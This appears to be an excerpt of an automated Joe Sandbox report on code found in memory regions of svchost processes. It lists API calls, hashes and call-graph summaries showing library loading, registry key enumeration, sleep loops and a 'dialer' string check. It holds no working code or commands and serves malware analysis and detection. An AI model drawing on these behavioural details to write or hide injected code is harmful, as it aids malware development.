                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704

                                                                                Control-flow Graph

• Rendered graph not reproduced; entry block 257e10aa544
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90

Execution Graph

Execution Coverage: 0.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 230
Total number of Limit Nodes: 4
                                                                                execution_graph (rendered graph; the node and edge listing is collapsed here to the functions and API calls it names)
                                                                                • Module at 1F28C1D0000: 1f28c1d273c -> 1f28c1d276a -> 1f28c1d2858 LoadLibraryA, looping back to 1f28c1d276a until the exit at 1f28c1d28d4.
                                                                                • Module at 1F28C930000, entry 1f28c931abc: calls 1f28c931628 (GetProcessHeap; four calls to 1f28c931268, each GetProcessHeap plus one more API; nine RegOpenKeyExW, the root at 1f28c93168e and eight subkeys from 1f28c9316c0 to 1f28c931861, each followed by RegCloseKey), then loops at 1f28c931acb over Sleep / SleepEx (1f28c931ad2), StrCmpIW / StrCmpW (1f28c931598) and 1f28c9318b4 -> 1f28c9314a4 (GetProcessHeap).
                                                                                • Subkey enumeration inside 1f28c931628: 1f28c9312bc (RegQueryInfoKeyW, GetProcessHeap, RegEnumValueW, lstrlenW, StrCpyW, name matching in 1f28c93152c with StrCmpIW / StrCmpW; 11 API calls) and 1f28c93104c (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, RegCloseKey; 4 API calls).
                                                                                • CRT nodes 1f28c93ca0c to 1f28c943140: __free_lconv_num, EnterCriticalSection (1f28c93c99c), FlsSetValue (1f28c93cfa0), _invalid_parameter_noinfo, Concurrency::details::SchedulerProxy::DeleteThis.

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8f8718106759883864cae2a8ca865240e286cea242c12ae6e8bb01d1b0de8f1e
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: F4E06DB5641E45C7EB048F62D8083AA3AE1FB8DF86F04C024C90907351DF7D8599C750

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b4d9601b441b195fc890c788491207d0644a6a96c7f54882ecefb715d9f87218
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: B7118471AD0EC382FB60A731F8053F922D4B7543C5F98A1BCD90E87995EF79C0458200

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                                  • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                                • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                                • SleepEx.KERNELBASE ref: 000001F28C931ADD
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: b67c1932e62b7ac0013a9a1692b6bd7ceba26b73bf7a76d8ab9135420b3866fa
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 81316871281EC292EB509B36DA512F963F5AB84BD4F0C74B1DE09876BAFF34C851C211

                                                                                Control-flow Graph

                                                                                control_flow_graph (rendered graph with an Executed / Not Executed legend; block listing collapsed): 1f28c933844-1f28c93384f -> StrCmpNIW in 1f28c933851-1f28c933864 -> 1f28c933866 -> exit 1f28c933869-1f28c933870; the entry block can also branch straight to the exit, skipping the compare.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: dialer
                                                                                • API String ID: 0-3528709123
                                                                                • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction ID: 35bd7b7e84aeabd97046de9deeb150375f1cc12c8c169a2c29cf3a1cf66da4a6
                                                                                • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                                • Instruction Fuzzy Hash: 3ED05E71391A8786FB149FA688C46B06390AB047C4F8C90B4CE0403550DB38C98E9610

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
